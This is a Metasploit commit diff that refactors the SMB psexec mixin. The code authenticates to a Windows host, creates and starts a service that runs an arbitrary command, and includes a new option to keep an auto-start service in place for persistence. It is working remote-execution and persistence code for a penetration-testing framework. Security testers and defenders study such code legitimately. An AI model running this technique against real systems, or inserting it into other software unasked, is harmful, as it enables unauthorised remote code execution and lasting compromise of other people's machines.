Land rapid7#3144, psexec refactoring

Author: Tod Beardsley

lib/msf/core/exploit/smb/psexec.rb

@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+require 'rex/proto/dcerpc/svcctl'
 
 module Msf
 
@@ -12,9 +13,50 @@ module Msf
 
 module Exploit::Remote::SMB::Psexec
 
+  include Rex::Constants::Windows
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB::Authenticated
 
+  def initialize(info = {})
+    super
+    register_options(
+      [
+        OptString.new('SERVICE_NAME', [ false, 'The service name', nil]),
+        OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptBool.new('SERVICE_PERSIST', [ true, 'Create an Auto run service and do not remove it.', false])
+      ], self.class)
+  end
+
+  # Retrieve the SERVICE_NAME option, generate a random
+  # one if not already set.
+  #
+  # @return service_name [String] the name of the service.
+  def service_name
+    @service_name ||= datastore['SERVICE_NAME']
+    @service_name ||= Rex::Text.rand_text_alpha(8)
+  end
+
+  # Retrieve the SERVICE_DISPLAY_NAME option, generate a random
+  # one if not already set.
+  #
+  # @return service_display_name [String] the display name of the service.
+  def display_name
+    @display_name ||= datastore['SERVICE_DISPLAY_NAME']
+    @display_name ||= Rex::Text.rand_text_alpha(16)
+  end
+
+  # Retrieve the SERVICE_DESCRIPTION option
+  #
+  # @return service_description [String] the service description.
+  def service_description
+    @service_description ||= datastore['SERVICE_DESCRIPTION']
+  end
+
   # Retrives output from the executed command
   #
   # @param smbshare [String] The SMBshare to connect to.  Usually C$
@@ -37,7 +79,6 @@ def smb_read_file(smbshare, host, file)
     end
   end
 
-
   # Executes a single windows command.
   #
   # If you want to retrieve the output of your command you'll have to
@@ -47,115 +88,109 @@ def smb_read_file(smbshare, host, file)
   # {Exploit::FileDropper#cleanup} and
   # {Exploit::FileDropper#on_new_session} handlers do it for you.
   #
-  # @todo Figure out the actual exceptions this needs to deal with
-  #   instead of all the ghetto "rescue ::Exception" madness
   # @param command [String] Should be a valid windows command
   # @param disconnect [Boolean] Disconnect afterwards
-  # @param service_description [String] Service Description
-  # @param service_name [String] Service Name
-  # @param display_name [Strnig] Display Name
   # @return [Boolean] Whether everything went well
-  def psexec(command, disconnect=true, service_description=nil, service_name=nil, display_name=nil)
+  def psexec(command, disconnect=true)
     simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
     handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
     vprint_status("#{peer} - Binding to #{handle} ...")
     dcerpc_bind(handle)
     vprint_status("#{peer} - Bound to #{handle} ...")
     vprint_status("#{peer} - Obtaining a service manager handle...")
-    scm_handle = nil
-    stubdata = NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F)
-    begin
-      response = dcerpc.call(0x0f, stubdata)
-      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
-        scm_handle = dcerpc.last_response.stub_data[0,20]
-      end
-    rescue ::Exception => e
-      print_error("#{peer} - Error getting scm handle: #{e}")
-      return false
-    end
-    servicename = service_name || Rex::Text.rand_text_alpha(11)
-    displayname = display_name || Rex::Text.rand_text_alpha(16)
-
-    svc_handle = nil
-    svc_status = nil
-    stubdata =
-      scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) +
-      NDR.long(0x0F01FF) + # Access: MAX
-      NDR.long(0x00000110) + # Type: Interactive, Own process
-      NDR.long(0x00000003) + # Start: Demand
-      NDR.long(0x00000000) + # Errors: Ignore
-      NDR.wstring( command ) +
-      NDR.long(0) + # LoadOrderGroup
-      NDR.long(0) + # Dependencies
-      NDR.long(0) + # Service Start
-      NDR.long(0) + # Password
-      NDR.long(0) + # Password
-      NDR.long(0) + # Password
-      NDR.long(0) # Password
-    begin
-      vprint_status("#{peer} - Creating the service...")
-      response = dcerpc.call(0x0c, stubdata)
-      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
-        svc_handle = dcerpc.last_response.stub_data[4,20]
-        svc_status = dcerpc.last_response.stub_data[24,4]
-      end
-    rescue ::Exception => e
-      print_error("#{peer} - Error creating service: #{e}")
-      return false
+
+    svc_client = Rex::Proto::DCERPC::SVCCTL::Client.new(dcerpc)
+    scm_handle, scm_status = svc_client.openscmanagerw(datastore['RHOST'])
+
+    if scm_status == ERROR_ACCESS_DENIED
+      print_error("#{peer} - ERROR_ACCESS_DENIED opening the Service Manager")
     end
 
-    if service_description
-      vprint_status("#{peer} - Changing service description...")
-      stubdata =
-        svc_handle +
-        NDR.long(1) + # dwInfoLevel = SERVICE_CONFIG_DESCRIPTION
-        NDR.long(1) + # lpInfo -> *SERVICE_DESCRIPTION
-        NDR.long(0x0200) + # SERVICE_DESCRIPTION struct
-        NDR.long(0x04000200) +
-        NDR.wstring(service_description)
-      begin
-        response = dcerpc.call(0x25, stubdata) # ChangeServiceConfig2
-      rescue Rex::Proto::DCERPC::Exceptions::Fault => e
-        print_error("#{peer} - Error changing service description : #{e}")
-      end
+    return false unless scm_handle
+
+    if datastore['SERVICE_PERSIST']
+      opts = { :start => SERVICE_AUTO_START }
+    else
+      opts = {}
     end
 
-    vprint_status("#{peer} - Starting the service...")
-    stubdata = svc_handle + NDR.long(0) + NDR.long(0)
-    begin
-      response = dcerpc.call(0x13, stubdata)
-      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
-      end
-    rescue ::Exception => e
-      print_error("#{peer} - Error starting service: #{e}")
+    vprint_status("#{peer} - Creating the service...")
+    svc_handle, svc_status = svc_client.createservicew(scm_handle, service_name, display_name, command, opts)
+
+    case svc_status
+    when ERROR_SUCCESS
+      vprint_good("#{peer} - Successfully created the service")
+    when ERROR_SERVICE_EXISTS
+      service_exists = true
+      print_warning("#{peer} - Service already exists, opening a handle...")
+      svc_handle = svc_client.openservicew(scm_handle, service_name)
+    when ERROR_ACCESS_DENIED
+      print_error("#{peer} - Unable to create service, ACCESS_DENIED, did AV gobble your binary?")
+      return false
+    else
+      print_error("#{peer} - Failed to create service, ERROR_CODE: #{svc_status}")
       return false
     end
-    vprint_status("#{peer} - Removing the service...")
-    stubdata = svc_handle
-    begin
-      response = dcerpc.call(0x02, stubdata)
-      if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil
+
+    if svc_handle.nil?
+      print_error("#{peer} - No service handle retrieved")
+      return false
+    else
+
+      if service_description
+        vprint_status("#{peer} - Changing service description...")
+        svc_client.changeservicedescription(svc_handle, service_description)
+      end
+
+      vprint_status("#{peer} - Starting the service...")
+      begin
+        svc_status = svc_client.startservice(svc_handle)
+        case svc_status
+        when ERROR_SUCCESS
+          print_good("#{peer} - Service started successfully...")
+        when ERROR_FILE_NOT_FOUND
+          print_error("#{peer} - Service failed to start - FILE_NOT_FOUND")
+        when ERROR_ACCESS_DENIED
+          print_error("#{peer} - Service failed to start - ACCESS_DENIED")
+        when ERROR_SERVICE_REQUEST_TIMEOUT
+          print_good("#{peer} - Service start timed out, OK if running a command or non-service executable...")
+        else
+          print_error("#{peer} - Service failed to start, ERROR_CODE: #{svc_status}")
+        end
+      ensure
+        begin
+          # If service already exists don't delete it!
+          # Maybe we could have a force cleanup option..?
+          if service_exists
+            print_warning("#{peer} - Not removing service as it already existed...")
+          elsif datastore['SERVICE_PERSIST']
+            print_warning("#{peer} - Not removing service for persistance...")
+          else
+            vprint_status("#{peer} - Removing the service...")
+            svc_status = svc_client.deleteservice(svc_handle)
+            if svc_status == ERROR_SUCCESS
+              vprint_good("#{peer} - Successfully removed the sevice")
+            else
+              print_error("#{peer} - Unable to remove the service, ERROR_CODE: #{svc_status}")
+            end
+          end
+        ensure
+          vprint_status("#{peer} - Closing service handle...")
+          svc_client.closehandle(svc_handle)
+        end
       end
-    rescue ::Exception => e
-      print_error("#{peer} - Error removing service: #{e}")
-    end
-    vprint_status("#{peer} - Closing service handle...")
-    begin
-      response = dcerpc.call(0x0, svc_handle)
-    rescue ::Exception => e
-      print_error("#{peer} - Error closing service handle: #{e}")
     end
 
     if disconnect
       sleep(1)
       simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
     end
 
-    return true
+    true
   end
 
   def peer
-    return "#{rhost}:#{rport}"
+    "#{rhost}:#{rport}"
   end
 
 end

lib/rex/constants.rb

@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+
 #
 # Log severities
 #